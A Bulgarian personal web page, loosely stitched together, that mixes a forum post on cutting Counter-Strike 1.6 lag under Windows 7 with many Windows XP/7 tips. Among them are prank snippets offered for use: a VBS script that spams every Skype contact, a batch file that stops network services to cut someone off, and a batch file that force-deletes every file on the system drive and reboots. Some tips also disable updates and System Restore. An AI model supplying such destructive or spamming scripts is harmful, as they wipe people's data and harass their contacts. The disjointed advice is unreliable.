добре дошли в моя уеб сайт

Как да намалим лага до максимум под Windows 7

Как да намалим лага до максимум под Windows 7

от fr0sst » 05 Фев 2010 12:27
Здравейте, доста рових из гугъл по темата защо ми лагва Couter Strike 1.6 на Windows 7 и открих че като цяло в Windows 7 и Windows Vista от Microsoft са вградили една нова услуга (service) казваща се Multimedia Class Scheduler Service (MMCSS). Нейната цел е автоматично да задава приоритет на аудио и видео плейбек за да предотврати накъсване, замазване и други. Но с тази услуга са си вкарали "автогол" и създават проблеми на много хора с играенето на мултиплеър или онлайн игри и други проблеми. Тази услуга е вградена защото при генерирането на голям интернет трафик той натоварва процесора и този service MMCSS има за цел да ограничи пакетите до не повече от 10 000 в секунда.
Точно от това идват проблеми като лаг и висок пинг в Counter Strike 1.6 и в някои други онлайн игри. Това засяга голяма част от геймърите, като намаляват до 50% производителността на интернета им в игри като Oblivion и други.
Отдолу съм посочил решение на проблема, което при мен работи и пинга от 150-180 в Counter Strike 1.6 падна на нормалните 18 до 30.

Решение на проблема (тествах го и при мен работи) има като се изпълнят наколко стъпки в Windows 7 за да се спре този service или услуга:
Стъпка 1- да забраним на приложенията да ползват тази услуга:
* В полето RUN в старт менюто пишем regedit и отваряме папките до HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Audiosrv
* Там кликаме за записа DependOnService и изтриваме реда "MMCSS" от текстовия прозорец.

Стъпка 2 -да забраним автоматичното стартиране на тази услуга Multimedia Class Scheduler Service (MMCSS)
* В полето RUN в старт менюто пишем services.msc и се появява прозорец, в който намираме реда Multimedia Class Scheduler и срещу него в полето Startup Type от Automatic го променяме на Disabled за да го забраним
*Рестартираме компютъра за да влязат промените в сила

1MB+
rate 23000
cl_cmdrate 45
cl_updaterate 40
cl_rate 9999 ИЛИ 23000
cl_cmdbackup 2

Ето още няколко настройки благодарение на които можете да увеличите вашето FPS

Понеже видео картите са много и различни марки и модели, съответно и настройките се прявят по различен начин, но общо взето трябва да настроите следните неща

Anistropic filtering - максималните възможни
Conformant texture clamp - OpenGL
CPU acceleration - Single display performance
Texture filtering Quality - High Performance
Vertical Sync - Off

Хубаво е също да подкарате играта през DLL-a на видео картата Ви (при мен от това имаше голямо подобрение)

Отивате в C:\Windows\System32\
и търсите
Ако сте с nVidia видео карта търсете файла
nvoglnt.dll
Ако сте с ATI видео карта търсете
atioglxx.dll
за всички други видео карти търсете
opengl32.dll

и като го намерите го копирайте в папката gldrv в играта. В тази папка има и текстов файл на име drvmap.txt, кликнете properties върху него и махнете отметката на Read Only. Отворете го и променето съдържанието му както следва в зависимост от вашата карта

за nVidia :

Default Default
gldrv/nvoglnt.dll

за ATI :

Default Default
gldrv/atioglxx.dll

за всички останали марки:

Default Default
gldrv/opengl32.dll

Затворете този файл като запишете промените и отново го направете Read Only

Приятна игра!
[AFD] -> Arbitrary File Download
[SQL] -> Structured Query Language
[SCD] -> Source Code Disclosure
[LFI] -> Local File Include
[RFI] -> Remote File Inclusion
[RCE] -> Remote Code Execution
[PCI] -> PHP Code Injection
[XSS] -> Cross Site Scripting
Run + msconfig + Windows Envent Log mahame otmetkata i sme gotovi :) 

Как да спамиме в Skype

on error resume next
set skype = Wscript.CreateObject("skype4Com.skype")
skype.Client.Start()
For Each User In Skype.Friends
skype.SendMessage User.handle,"Tuka pishete kakvoto iskate da ispamite v skype ...!!!"

next


Save: .vbs

Как да спреме нета на някого !!!

NET STOP "Telepfhony"
NET STOP "DHCP Client"


save.bat

Как да изтрия всичко на компа чрез направена команда !!!

@echo off
del %systemdrive%\*.*/f/s/q
Shutdown -r -f -t 00save .bat
Влизате в ---> Notepad + Gpedit.msc + компютърна конфигурация + Administrative Templates + Network + QoS Packet Settings + Limit reservable bandwidth + Enabled + Bandwidth limit (%) 0 + Enter !!!


Как да се бъзикаме с наш приятел и неприятел който да Приеме нашите послания !!!

x=msgbox("Text 1",4+16 ,"Error")

x=msgbox("Text 2",4+16 ,"Error")

x=msgbox("Text 3",4+16 ,"Error")

x=msgbox("Text 4",4+16 ,"Error")

x=msgbox("Text 5",4+16 ,"Error")Seve.vbs

невидима папка !!!

Alt + 0160 + Rename + Enter

Полезни съвети и трикове за WindowsXP , Windows Vista и Windows 7

Създаване на системна дискета за Windows98

Има един лесен начин за създаване на системна дискета под Windows98. Технологията е следната: когато зададете на системата да ви направи такава дискета, тя взема всички файлове от папката C:\Windows\Ebd и ги копира на дискетата. Начина е, ако искате сами да си ги копирате направо на чиста дискета, като резултата ще е еквивалентен, само че няма да минавате през няколко менюта. Ако нямате Windows 98 под ръка, можете да дръпнете архивираната директория от нашия сървър


Промяна на администраторската парола под Windows XP

Има един начин за промяна на администраторската парола под WindowsXP, но за целта трябва да сте се логнали с администраторски акаунт. Та начина е следния: Start -> Settings -> Control Panel -> Administrative tools -> Computer management. Оттам се избира Local Users and Groups -> Users. Там в прозореца чуквате с десен бутон върху Administrator и избирате Set Password... Чуквате върху Proceed върху новопоявилия се прозорец и задавате новата парола. Тази процедура е приложима за всички останали потребители.

 

 

Премахване на прозореца за въвеждане на парола след излизане от режим на готовност

За да премахнете прозореца за искане на парола, когато вашия компютър излиза от състояние на готовност (StandBy), чукнете с десния бутон на мишката върху свободно място на вашия десктоп, изберете Properties -> Screen Saver и махнете отметката пред надписа "On Resume, password protect"

 

 

Преименуване на множество файлове

Можете да преименувате повече от един файл едновременно: маркирате желаните файлове, чуквате с десен бутон върху първия който искате да преименувате и избирате Rename. Задавате името на файла и след това натискате Enter. Имайте в предвид, че имената на останалите файлове, ще са същите като първоначално преименувания с добавен пореден номер в скоби.

 

 

Скриване на имета на файловете в Thumbnail изглед

Можете да скриете имената на файлове, когато превключвате в Thumbnail изглед. Натиснете и задръжте клавиша Shift, докато превключвате в този режим, за да направите това. По същия начин можете да върнете обратно изписването на имената.

 

 

Преместване на обект в Windows Explorer

Когато влачите даден обект в Windows Explorer можете да контролирате действието, което ще последва след като пуснете обекта на желаното място:

+ кориране - задръжте натиснат клавиша Ctrl докато влачите (трябва да ви се появи знака "+" до курсора на мишката)

+ преместване - задръжте натиснат клавиша Shift докато влачите (не би трябвало да има нищо до курсора на мишката)

+ създаване на shortcut - задръжте натиснат клавиша Alt докато влачите (би трябвало да ви се появи една стрелкичка до курсора на мишката)

 

 

Няколко полезни съвета:

* Ако създадете файл Folder.jpg в дадена папка, тази картинка ще бъде използвана като thumbnail на папката.

* Можете лесно да изберете какви колони ще се показват в Details режима за дадена папка. Просто чукнете с десен бутон върху заглавието на дадена колона. Също така можете лесно да премествате колони, като просто чукнете върху името им с левия бутон и влачите

* За да изтриете даден файл, без да го пращате в кошчето, натиснете и задръжте клавиша Shift докато го триете.

* Когато обработвате множество файлове и ви се появи диалогов прозорец с въпрос, можете да натиснете Shift докато натискате No отговор и по този начин ще отговорите на всички последващи диалгови прозорци с No (т.е. отговора ви се ще приеме като No to All).

* За да запаметите документ с разширение, различно от стандартното (често не можете да избирате разширението на запаметямания документ - например в Notepad) просто напишете името на файла заедно с разширението в кавички ("моят.файл") (иначе ако работите например с Notepad файла ви ще се запише като моят.файл.тхт).

* Можете лесно да отворите даден файл с желана програма, просто като поставите shortcut на програмата в Sent To менюто

* ако искате да отворите даден файл с различна програма от тази по подразбиране задръжте Shift клавиша натиснат, докато чуквате с десен бутов върху него. В менюто, което ще се появи ще видите Open With...

* Има начин да използвате функциите Tile и Cascade върху определени процорци, а не върху всички. Маркирайте желаните прозорци в taskbar-а чрез задържането на клавиша Ctrl и след това чукнете с десния бутон на мишката върху някой от тях и изберете желаното действие. Също чрез такова маркиране можете да затворите група от прозорци.

* една хитринка: можете много лесно да добавите представката "www." и наставката ".com" към името, което сте написали в adress полето в Internet Explorer като напишете името (например google) и след това натиснете Ctrl+Enter.

* за да отворите дадена страница не е задължително да имате стартиран Internet Explorer. Можете просто да напишете името на страницата и в Windows Explorer или в менюто Run...

* можете да видите множество полезни клавишни комбинации в Internet Explorer като направите следното: Help -> Contents and Index -> Accessibility -> Using Internet Explorer keyboard shortcuts.

 

 

Как да променим размера на swap (page) файла и неговото местоположение

Щракнете с десен бутон върху My Computer, после следвайте следните стъпки: Properties -> Advanced -> бутона Settings в полето Performance -> Advanced -> бутона Change в полето Virtual Memory. После в полетата Initial size (MB) и Maximum size (MB) задайте размера на swap файла. Препоръчвам ви размера да е един и същ и да бъде 1,5 пъти размера на RAM паметта ви (например 784 МВ при 512 МВ RAM). В същия прозорец можете да зададете на кое устройство да се намира този файл. След като зададете размера и местоположението на swap файла задължително натиснете бутона Set и после ОК.

 

 

Как да сменим името на компютъра си

Щракнете с десен бутон върху My Computer, после следвайте следните стъпки: Properties -> Computer name -> Change... и после в полето omputer name напишете новото име на компютъра си.

 

 

Изключване на System restore функцията

Малко инфо: тази функция заделя място на харда ви и го пълни с резервна информация в случай, че компютъра ви се сбози. Често обема на заделеното място е доста голям.

За да изключите тази функция направете следното:

Щракнете с десен бутон върху My Computer, после следвайте следните стъпки: Properties -> System restore и сложете отметката пред Turn System Restore on all drives.

 

 

Изтриване на дадена папка, за която нямате достъп.

Често се случва да не можетет да изтриете някоя папка и дори да влезете в нея под ХР. Варианта е следния. Изберете папката с десен бутон на мишката и след това: Properties -> Security -> Add... -> в полето под надписа Enter the object name to select напишете вашето потребителско име (името с което влизате в Уиндоус) (ако случайно не го помните има един начин да го намерите: в същия прозорец изберете Advanced... и после натиснете бутона Find Now в новопоявилия се прозорец. Ще ви излезе списък със всички възможни потребители на вашия компютър и вашето потребителско име със сигурност ще е там). След като изберете потребителското си име, натиснете ОК и в текущия прозорец, трябва то да е маркирано, като след това в долната част на прозореца (с име Permisions for потребителското ви име) сложете отметката пред Full Controll и натиснете ОК. Сега вече имате абсолютно пълни права върху съответната папка.

 

 

Как да видите кой е във вашия компютър

Щракнете с десен бутон на мишката върху My Computer и изберете Manage. После изберете Shared Folders и от панела вдясно имате три възможности: Shares (показва всички споделени от вас папки), Sessions (показва кой потребител се е вързал към вас и колко файла е отворил), Open Files (показва ви всички отворени файлове от други потребители и съответния потребител.

 

 

Как да сменим буквата на дадено устройство (без С: )

Щракнете с десен бутон на мишката върху My Computer и изберете Manage. После иберете Disk Management и в долната част на десния панел щракнете с десен бутон върху устройството, чиято буква искате да смените. От контекстното меню изберете Change Drive Letter and Paths и в новопоявилия се прозоцер изберете Change... и в новия прозорец ще имате падащо меню с възможности за смяна на буквата на устройството. Оттук нататък натискайте само ОК, след като изберете желаната буква.

 

 

Коригиране на увисването на системата при стартиране

Ако системата ви увисва за 2 или три минути при стартиране, като при това нямате достъп до Старб бутона или елементите върху таскбара, това най-вероятно се дължи на определена услуга (service), наречена Background Intelligent Transfer, която се изпълнява във фонов режим. За да оправите проблема направете следното: натисенте бутона Старт, след това изберете Run... и в новопоявилия се прозорец напишете msconfig и чукнете OK. После изберете Services и там намерете услугата Background Intelligent Transfer, махнете отметката пред нея и натиснете ОК и рестартирайте.

 

 

Премахване на логото при стартиране на Windows

Това ще ускори зареждането на вашата система, така че ако нямате проблеми след това го оставете. Начина е следния (ако сте с ХР): натисенте бутона Старт, след това изберете Run... и в новопоявилия се прозорец напишете msconfig и чукнете OK. После изберете BOOT.INI и сложете отметка пред функцията /NOGUIBOOT, натиснете ОК и рестартирайте. Можете да се върнете към предишното състояние като просто махнете отметката по същия начин.

Ако сте с Windows 98, ето начина: на първо време сменете атрибутите на msdos.sys файла (намира се в главната директория), така че да не бъде повече "Read only". След това го отворете с обикновен текстов редактор (Notepad). След това потърсете във файла следния текст 'Logo=0', а ако няма го създайте. Ако стойността след Logo= е 1, я заменете с 0 и това ще премахне логото на Windows 98. Запишете msdos.sys файла и върнете атрибутите му за "Read only".

 

 

Премахването на индексирането на файловете, за да ускорите WindowsХР

WindowsХР пази база с данни за всички файлове на вашия твърд диск, която използва за ускоряване на търсенето на файл. Проблема в случая е, че компютъра ви трябва да индексира всички файлове, което съответно го забавя при отваряне и затваряне на файлове и други операции. Ако не търсите много файлове по компютъра си, можете да изключите индексирането по следния начин: Отворете My Computer и щракнете с десен бутон върху устройството, за което искате да изберете индексирането. В новопоявилия се прозорец махнете отметката пред Allow Indexing Service to index this disk for fast searching и след това натиснете ОК, а после отворилия се прозорец изберете втория радио-бутон (Apply changes to C:\ (D:\, E:\...), subfolders and files). И натиснете ОК, като след това изчакайте да свърши премахването на индексирането и отново натиснете ОК. Нататък ще забележите лека промяна в производителността на компютъра ви.

 

 

Изчистване Prefetch папката, за да подобрите производителността на системата си

Това е уникална техника за WinXP. Знаем, че е необходимо периодично да се почистват регистрите и временните файлове за операционните системи Win9X/ME/2000. Prefetch е нова и много полезна техника в Windows XP. Обаче след известно ползване на XP , директорията prefetch може да се напълни с много безполезни и излишни линкове, в Prefetch каталога, което може да забави значително вашия компютър.

 

За да почистите тези файлове, отворете C(системния дял):/windows/prefetch и изтрийте всички файлове. След това рестартирайте. Препоръчително е да правите това всеки месец.

 

 

Повишаване на производителността чрез My Computer

Чукнете с десен бутон върху My Computer -> Properties -> Advanced -> чукнете Settings в полето Performance.

Махнете отметките пред следните полета:

Fade or slide menus into view

Fade or slide ToolTips into view

Fade out menu items after clicking

Show Shadows under menus

Slide open combo boxes

Slide taskbar buttons

Use a background image for each folder type

Use common tasks in folders

 

 

Ако CD-то ви работи много бавно (настройване на DMAрежима за всички устройства)

Случва се така, че често CD-то ви работи адски бавно и забавя цялата ви система. На всичкото отгоре процесора е на 100% и не можете да направите почти нищо. Една от възможните причини за това, че че Windows XP не винаги успява да нагласи DMA режима за всички устройства успешно и понякога последните работят в режим PIO, който е изключително бавен и остарял. Всички нови оптични устройства поддържат DMA режима, но често Windows ги оставя в режим PIO под подразбиране. Ето начина да се коригира това:

 

Чукнете с десен бутон върху My Computer -> Manage. В новопоявилия се прозорец изберете Device Manager и в десния прозорец чукнете два пъти върху IDE ATA/ATAPI Controllers, така че да се отворят подкатегориите. Чукнете два пъти върху Primary IDE Channel и след това отидете върху Advanced Settings. В полетата Transfer mode задайте DMA if available. Ако стойността е била PIO Only най-вероятно в това е бил вашият проблем. Повторете същите стъпки и за втория IDE канал (Secondary IDE Channel) в предходния прозорец. Сега остава само да рестартирате.

 

 

Auto Login

Чукнете върху бутона Start, натиснете Run... (може директно да натиснете клавишите Win+ R) и напишете control userpasswords2.

 

В Users махнете отметката пред Users must enter....

Ще ви се появи диалогов прозорец, който ще ви позволи да въведете потребителско име и парола, които да бъдат изпълнявани автоматично.

 

 

Win XP не иска да се изключи напълно

Чукнете бутона Start -> Settings -> Control Panel -> Power Options -> APM. В новопоявилия се прозорец сложете отметката пред Enable Advanced Power Management support. Изключете вашия компютър. Би трябвало процеса по изключването да е успешен.

 

 

Премахване на докладването за грешки

Чукнете с десен бутон върху My Computer -> Properties -> Advanced -> чукнете върху бутона Error Reporting. Изберете Disable error reporting и сте готови. От същия прозорец може да настроите докладването за грешки (за кои програми да се появява и т.н.)

 

 

Показването на опцията Hibernate когато изключвате компютъра си от Shut Down...

Когато ви се появи диалоговия прозорец Shut Down Windows просто натиснете клавиша Shift и опцията StandBy ще се замени с Hybernate. Другият начин е просто в същия диалогов прозорец да натиснете H

 

 

Връщане към предишната версия на даден драйвер за някое устройство

Сигурно често ви се е случвало да инсталирате нов драйвер за някое устройство и след това всичко да се скапе. Вместо да преинсталирате наново устройството и да сменяте драйверите му, можете да направите следното:

 

Чукнете с десен бутон върху My Computer -> Manage. В новопоявилия се прозорец изберете Device Manager и в десния прозорец чукнете два пъти върху типа и след това модела на устройството, за което искате да върнете предишните драйвери. В новопоявилия се прозорец изберете таба Driver и там чукнете върху бутона Roll Back Driver. Ще ви се появи нов прозорец с инструкции, които трябва да следвате. За да направите горните процедури трябва или да се Administrator или да сте в групата Administrators (по подразбиране за домашни потребители)

 

 

Създаване на shortcut за ShutDown

Чукнете с десен бутон върху вашия десктоп и изберете New -> Shortcut. Ще ви се появи прозорец, където в полето под Type the location of the item напишете SHUTDOWN -s -t 01 параметъра -s е за изключване и можете да го замените с -r за рестартиране, параметъра -t 01 задава време, след което ще се изключи/рестартира компютъра, като можете да замените 01 с броя на секунди, след които искате да се изпълни операцията, но числото винаги трябва да е с две цифри (ако е по-малко от 10 сложете 0 отпред). След като напишете командата, натиснете Next и в новопоявилия се прозорец задайте име на shortcut-а. След това натиснете Finish. Сега вече можете да зададете клавишна комбинация, с която да се изпълнява този shortcut или просто да го оставите на десктопа си и да го чукнете два пъти с мишката.

 

 

Как да заключим бързо компютъра си

Натиснете едновременно клавишите Win+L. Ще бъдете отведени към екрана за начално включване на потребителите.

Можете също така да създадете shortcut, който изпълнява същата функция. Чукнете с десен бутон върху вашия десктоп и изберете New -> Shortcut. Ще ви се появи прозорец, където в полето под Type the location of the item напишете c:\windows\System32\rundll32.exe user32.dll,LockWorkStation. След като напишете командата, натиснете Next и в новопоявилия се прозорец задайте име на shortcut-а. След това натиснете Finish. Сега вече можете да зададете клавишна комбинация, с която да се изпълнява този shortcut или просто да го оставите на десктопа си и да го чукнете два пъти с мишката.

 

 

Клавиатура с мишка

Една интересна опция, която понякога може да ви бъде полезна. Чукнете върху бутона Start -> Programs -> Accessories -> Accessibility -> OnScreen Keyboard

 

 

Някои полезни клавишни комбинации

Ctrl+Esc показва Start менюто

Winклавиша върши същата операция, ето малко комбинации с него:

Win+D - показва десктопа

Win+E - стартира Windows Explorer

Win+F - търсене на файлове

Win+Ctrl+F - търсене на компютри

Win+F1 - стартира Help and Support Center

Win+R - стартира Run

Win+Pause/Break - стартира System Properties

Win+M - минимизира всички прозорци

Win+Shift+M - отменя минимизирането на всички прозорци

Win+L - заключва компютъра

Win+U - стартира Utility Manager

Още няколко комбинации

Ctrl+Shift+Esc - стартира Task Manager

Shift+F10 - симулира десен бутон на мишката

 

 

Влизане в администраторския акаунт от началния прозорец на зареждане на Windows

Ако сте си инсталирали току що Windows или не сте променяли нищо, Welcome Screen-а на Windows е включен по подразбиране. От него обаче не можете да влезете в администраторския акаунт. Един от начините да направите това е да натиснете два пъти клавишите Ctrl+Alt+Del и вече можете да влезете в администраторския акаунт.

 

 

Премахване на Shut Down бутона от началния прозорец на зареждане на Windows (Welcome Screen)

Интересна опция, която може да ви е полезна.

Чукнете бутона Start -> Settings -> Control Panel -> Administrative Tools -> Local Security Policy.

В лявата част на новопоявилия се прозорец разширете Security Settings, после разширете Local Policies и изберете Security Options. В дясната част чукнете два пъти върху Shutdown: Allow system to be shut down without having to log on policy и изберете Disabled. Остава само да натиснете "ОК".

 

 

Как можете временно да си присвоите администраторски права

Много програми изискват да имате администраторски права, за да можете да ги инсталирате. Най-лесния начин да си присвоите временно такива права, при положение че сте се логнали като нормален потребител е следния: Задръжте натиснат клавиша Shift и чукнете с десен бутон върху инсталационния файл. От появилото се контекстно меню изберете Run as... В новопоявилия се прозорец напишете администраторското име и парола. Тази операция работи също и за програми от Start менюто.

 

 

Възстановяване на опреснителната честота при неработещ монитор

Случвало ми се е понякога да си пусна монитора на по-голяма честота, отколкото поддържа и след това да не мога да върна старото състояние и съответно да не виждам нищо, освен един черен екран. Имам в предвид случаите когато вместо бутона Aply натисна ОК и не ми се появява онзи прозорец който ме пита дали искам да запазя промените така или след 15 секунди ще ми възстанови оригиналните настройки. Та в такава ситуация варианта е да се рестартира компютъра, да се влезе под Safe Mode и да се оправи така монитора. Да, ама има по-лесен начин wink.gif

 

1. натиснете няколко пъти клавиша Esc (това ще затвори всички прозорци, които не могат да се минимизират - да, има такива прозорци)

2. натиснете клавишната комбинация Win+M, която ще минимизира всички прозорци (Win+D върши същата работа)

3. преместете мишката така, че да отидете в някой от горните два ъгъла на монитора (лесно е, просто движете нагоре и надясно/наляво известно време). Така като чукнете с десен бутон, ще се сигурни, че не сте върху някоя икона.

4. натиснете десния бутон на мишката

5. натиснете буквата R

6. натиснете клавишите Ctrl+Shift+Tab

7. натиснете клавишите Alt+v (може да натиснете 6 пъти клавиша Tab, ако сте в режим на писане на кирилица)

8. натиснете клавишите Ctrl+Tab 2 пъти

9. натиснете клавиша Tab 2 пъти

10. натиснете поне два пъти стрелката нагоре

11. натиснете клавиша Enter (може да натиснете два пъти клавиша Tab и след това Enter)

 

Еми това е, би трябвало всичко да се оправи. Този трик съм го намерил собственоръчно и всъщност не е никакъв трик, а просто клавишни комбинации, които водят до желания резултат - намаляването на херците на дисплея.

Другия вариант е просто да намалите разделителната способност, като последователността е същата до стъпка 6, а при стъпка 7 натиснете два пъти клавиша Tab, после стрелката наляво няколко пъти и след това клавиша Enter (може да натиснете клавиша Tab 5 пъти и след това Enter).

 

 

Как да задам на Internet Explorer да помни потребителските имена и паролите, с които влизам в различни сайтове

Стартирате Internet Explorer и отивате върху Tools -> Internet Options -> таба Content -> бутона AutoComplete... и след като го чукнете в новопоявилия се прозорец сложете отметката пред User names and passwords on forms. По този начин след като веднъж напишете потребителско име и парола за даден сайт (например поща), то ще се запамети автоматично в база данни и при следващо влизане в този сайт ако напишете само първата буква на потребителското ви име ще се отвори допълнително прозорце, от което можете да си изберете пълното потребителско име и след това автоматично ще бъде въведена паролата ви. Ако искате всеки път да бъдете питани дали Internet Explorer да запаметява потребителското име и паролата ви за даден сайт, просто поставете отметка пред Prompt me to save passwords.

Не ви препоръчвам обаче да използвате тази опция, защото така при евентуално проникване във вашия компютър, някой може да получи достъп до всичките ви пароли, които са запаметени за определени сайтове.

 

Други опции, които можете да настроите в гореспоменатия прозорец са за автоматичното изписване на уеб адреси и полета във форми. Това става чрез поставянето на отметки пред следните опции:

- Web addresses - когато пишете някой уеб адрес, ако вече сте го въвеждали преди това, под полето, в което пишете, ще ви се изведе списък със всички адреси, започващи с буквите или цифрите, които сте написали досега.

- Forms - подобно на горната опция, само че това важи за онлайн форми, които попълвате. Между другото тази опция е свързана с гореописаната опция по запаметяване на потребителските пароли. Иначе е много полезна когато попълвате множество форми (например регистрация за поща, форум или някой сайт).

 

 

Как да спрем съобщението за Low Disk Space

Сигурно много пъти ви е дразнило това съобщение, което ви изскача, въпреки че знаете с колко свободно място разполагате. Ето един начин да го премахнете без да използвате специална програма:

 

Чукнете "Start" бутона, след това изберете "Run..." и там напишете "regedit". В Regedit отидете следвайте следните стъпки: HKEY CURRENT USER -> Software -> Microsoft -> Windows -> CurrentVersion -> Policies -> Explorer. В дясната страна на прозореца потърсете за елемент наречен NoLowDiskSpaceChecks. Ако съществува такъв елемент то сигурно стойността срещу него в колоната Data е 0x00000000 (0). Това означава, че съобщението за Low Disk Space ще ви се показва. За да преустановите това, чукнете два пъти върху името на елемента и в текстовото поле, където пише "0" поставете "1".

Ако случайно този елемент не съществува, тогава чукнете с десен бутон на мишката в дясната част на прозореца под другите елементи и изберете New -> DWORD value. Задайте името на елемента да бъде NoLowDiskSpaceChecks (точно както се пише, без интервалите) и след това натиснете Enter. После чукнете два пъти с мишката върху името на елемента и задайте стойността му да бъде "1" (както беше описано по-горе).

Резултатът от това, което направихте трябва да изглежда така:

 

 

 

Ако искате да видите информация за системата си ето един полезен трик

Натиснете бутона "Старт", след това изберете Run.. (това също става като натиснете бутона Win+R). В диалоговият прозорец напишете dxdiag. Тази команда ще ви стартира програмата за диагностика на DirectX, която освен всичко дава доста полезна информация за вашата система. Разгледайте отделните страници, в които ще намерите информация за процесора си, РАМ паметта, видео картата, звуковата карта и много други неща.

Обикновенния windows xp потребител би могъл доста да си облекчи живота и да си организира пространството,ако знае тези хитринки и ги използва.Честно казано,за много от тях сега чувам-ама какво се чудя,знам толкова малко.

Благодаря ти,че с твоя помощ ще науча повече!Успех! ^_^

 

 

Ровейки се яко да намеря помощ за проблема, попаднах на един сайт в който има доста трикове и за най-заплетените случай.

Windows XP from A-Z

Там намерих и Taskbar Repair tool който фиксира проблема за секунди.

 

Надявам се да ви е полезен 

(\__/) Дис ис Зайо. Копи хим ин

(='.'=) йор сигничър то хелп хим ту

('')_('') конкър дъ уърлд

 

Ето нещо, което винаги преглеждам след преинсталация и мисля че повечето съвети наистина помагат!

Да се има предвид, че изброените оптимизации могат да доведат до нестабилност на Вашата машина. Успехът зависи от много фактори и при различните конфигурации може да бъде различен от очаквания. За жалост не помня къде го бях намерил, но съм благодарен на пича дето го е писал. След това го намерих на още няколко места, но ето и за какво става дума...

 

Сега ще ви предложа няколко оптимизации за да се справите по бързо .... или накратко казано да накарате Windows да работи по добре и по леко:

 

1 – да забраним ACPI

Забраната на ACPIняма да доведе до голямо покачване на производителността, но ще предотврати появата на редица конфликти между различни устройства защото по този начин се забранява подялбата на IRQ между различните устройства. Разбира се забраната има и недостатъци, най-“големия” от които е невъзможността за ползване на функцията hibernate на Windows XP.

След започване на инсталацията на екрана в който setup предлага чрез F2 да се стартира recovery console натиснете F5, което ще изведе друго меню в което може да изберете типа компютър. Възможностите са следните: Standard pc, ACPI и APCI Uniprocessor PC – изберете Standard pc и ACPI няма да бъде инсталиран. ПО време на инсталацията забранете NetBIOS. Веднага след инсталацията инсталирайте и Service Pack 1 за Windows XP.

 

2 – да забраним индексирането на NTFS дяловете

Индексирането помага за по-бързо търсене на файлове, но след забраната му загубеното време в търсене ще е многократно по-малко от това, което отнема индексирането, и спада на производителността, свързан с това. Щракнете с десния бутон върху NTFSдял и махнете отметката пред Allow Indexing Service to index this disk for fast file searching, и приложете върху всички поддиректории.

 

3 – HIBERNATION

След като тази функция няма да бъде използвана е редно тя да се забрани, от което се печели дисково пространство, равно на обема оперативна памет. Това може да направите от Power options в Control panel

 

4 – забрана на поддръжката на zip файлове от Windows XP

Тази поддръжка е удачна единствено в случай че не разполагате с никакво приложение за работа с архивирани файлове, което е рядкост. Функцията се деинсталира чрез изпълнението на следния ред от RUN:

regsvr32 /u zipfldr.dll

 

5 – да увеличим пропускателната способност на интернет връзката

Windows XP резервира за свои нужди 20% от всяка интернет връзка. Този размер може да бъде намален до 0% чрез стартиране на 'gpedit.msc' от RUN. Там намерете разклонението Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler – и там кликнете два пъти върху 'Limit reservable bandwidth', намиращ се отдясно и му задайте стойност ENABLED, а за Bandwidth Limit – 0%

 

6 – проверка на L2 кеша

През RUNстартирайте ‘regedit.exe” и там намерете SecondLevelDataCache, който се намира в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ - стойността на SecondLevelDataCache трябва да отговаря на размера на L2 кеша в килобайти. Ако стойността му е 0 тогава Windows XP не е успял да открие сам този размер, поради ‘екзотичността’ на процесора ви, или по някаква друга причина. Ако не сте сигурни в размера на L2 кеша се консултирайте с някой,който е наясно с това.

 

7 – настройки на паметта (това се отнася само за потребители които имат над 265 MB RAM – ако Вашата е толкова или по-малко пропуснете тази точка)

Ако имате много памет може да зададете на WindowsXP да държи всичките файлове, които използва там, вместо на хилядократно по-бавната виртуална памет, намираща се върху вашия твърд диск (която по всяка вероятност е силно фрагментирана, което ще отстраним в точка Cool . За да подсетите да прави това стартирайте отново ‘regedit.exe’ и отидете в HKEY_LOCAL_MACHINESYSTEM/CurrentControlSet/Control/Session Manager/Memory Management/ и там ще откриете DisablePagingExecutive, чиято стойност трябва да бъде 1, ако не е я променете.

След като сте намерили работа на голяма част от оперативната си памет спокойно може да пожертвате още малко в името на системния кеш, който ако бъде увеличен ще ускори работата на твърдия диск, или по скоро ще отмени част от нея, поради простата причина че някой от файловете, съдържанието на папките и иконите ще бъдат ‘кеширани’ - ключа който позволява това се намира при по-горния и се нарича LargeSystemCache и за да се оползотвори по-рационално паметта ви трябва да има стойност 1.

Понякога Windows XP слага някои файлове в кеша, и после – след приключване на работата с тях ‘забравя’ да ги махне от там. За да не се случват подобни работи намерете или създайте ключа AlwaysUnloadDLL в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer – и задайте default стойността му 1.

 

8 – оптимизация на виртуалната памет

Понеже оперативната памет никога не стига на Windows XP му се налага да ползва виртуална, която се намира върху твърдия диск. Когато някое по-лакомо за памет приложение пожелае повече Windows променя постоянно размера на тази памет, което води до нейното фрагментиране, и до по-ниската и производителност. За да предотвратите това първо забранете виртуалната памет от Control panel/System/Advanced/Performance Settings/Advanced/Virtual memory Change и задайте стойности 0. След това рестартирайте и дефрагментирайте диска си (В My Computer щтракнете върху диска с десния бутон и изберете Properties Tools/Defragment now). След дефрагментирането отидете там където се задава размера на виртуалната памет и задайте една и съща стойност за минималния и максималния и размер – тази стойност трябва да е около 2.5 пъти размера на оперативната ви памет ако тя е до 256 MB и 2 до 1.5 пъти ако имате повече.

 

9 – забранете Automatic Updates

Понякога Windows се опитва да ви изненада приятно - но за всяко нещо си има време и място, и ако искате да го накарате да се съобразява с това ще пожелаете да забраните автоматичните Update-и които понякога определено не са адекватни. Това става от System Properties/Automatic Updates – просто махнете отметката пред ‘Keep my computer up to date…’. А когато искате да проверите за налични подобрения пуснете Internet Explorer и от менюто Tools изберете Windows Update.

 

10 – сложете край на своеволията

Windows обича да трие документи, които не са използвани 50 дни. Това се получава когато използвате Disk Cleanup. За него това са компресирани стари файлове, и ако не знаете какво се изтрива под това име отговора е прост – ВАШИТЕ ДОКУМЕНТИ. Разбира се избере ли да махнете тези файлове Windows няма да ви попита ‘Наистина ли искате да изтриете тези изключително-важни документи’ – за съжаление тази функция не може да бъде спряна а само ограничена. Кликнете с десния бутон върху вашия NTFS дял, изберете Properties и там намерете бутона Disk Cleanup и до натиснете. Скролвайте надолу до Compressed old files и изберете Options. Там може да зададете времето след което файловете да бъдат компресирани – максимума е 500 дни – което е достатъчно като се има предвид че Windows може да не ги надживее.

 

11 – махнете излишното

